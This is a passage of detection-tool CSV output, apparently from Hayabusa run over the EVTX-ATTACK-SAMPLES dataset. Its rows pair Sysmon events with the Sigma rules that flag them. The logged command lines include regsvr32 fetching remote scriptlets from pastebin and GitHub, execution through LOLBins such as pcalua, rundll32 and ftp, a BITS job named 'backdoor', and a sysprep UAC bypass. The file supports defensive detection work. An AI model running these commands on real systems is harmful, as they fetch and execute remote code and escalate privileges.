365ABB72-516B-5CD8-0000-001087E41600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:50.781 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | Process: C:\Windows\System32\pcalua.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 2952 | PGUID: 365ABB72-517E-5CD8-0000-001024D61700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:51.007 
+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 2920 | PGUID: 365ABB72-517E-5CD8-0000-00105FE01700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:01:51.007 +00:00,IEWIN7,1,low,Evas,Indirect Command Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:09:02.275 +00:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-12 17:20:01.980 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 
365ABB72-55C1-5CD8-0000-0010970D2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:31.183 +00:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.443 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.443 +00:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 17:20:49.458 +00:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-12 18:04:50.121 +00:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.155 +00:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:05.780 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:06.562 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 
365ABB72-6759-5CD8-0000-0010E2D50F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:35:06.562 +00:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-12 18:48:52.219 +00:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-12 18:48:52.766 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 14:50:59.389 +00:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 18:02:49.160 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 
365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.681 +00:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:19.895 +00:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 
365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:21.212 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:03:21.212 +00:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/net_connection_win_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-13 18:05:18.692 +00:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 00:29:52.744 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 00:32:22.775 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 
365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 00:32:36.775 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:04.306 +00:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation_sysmon/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 01:29:05.534 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: 
IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.290 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 
02:32:48.359 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:48.359 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.143 +00:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 
365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.453 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.470 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.487 +00:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 
365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.814 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 02:32:51.831 +00:00,IEWIN7,1,low,Exec,Non Interactive 
